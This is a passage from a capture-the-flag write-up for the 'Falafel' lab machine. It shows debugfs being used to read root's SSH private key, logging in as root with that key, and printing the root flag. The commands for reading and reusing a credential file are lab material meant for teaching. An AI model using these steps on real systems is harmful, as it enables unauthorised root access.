 2592  (12) usr    131762  (12) var    24441  (20) initrd.img   
 24442  (40) vmlinuz    145141  (3756) snap
```

As we are able to read the entire file system, we can grab the `id_rsa` file of the `root` user.

> debugfs: cat /root/.ssh/id\_rsa

```
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
```

Copy the key to our local machine, set its permissions to 600, and log in to the machine as root with it. Then, all we have to do is reap the harvest and take the root flag.

> nano id\_rsa
>
> chmod 600 id\_rsa
>
> ssh -i id\_rsa root\@10.10.10.73

```
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue May  1 20:14:09 2018 from 10.10.14.4
root@falafel:~# whoami
root
root@falafel:~# cat root.txt 
8acbf5e11783a28dd4d136164916c7cb
```

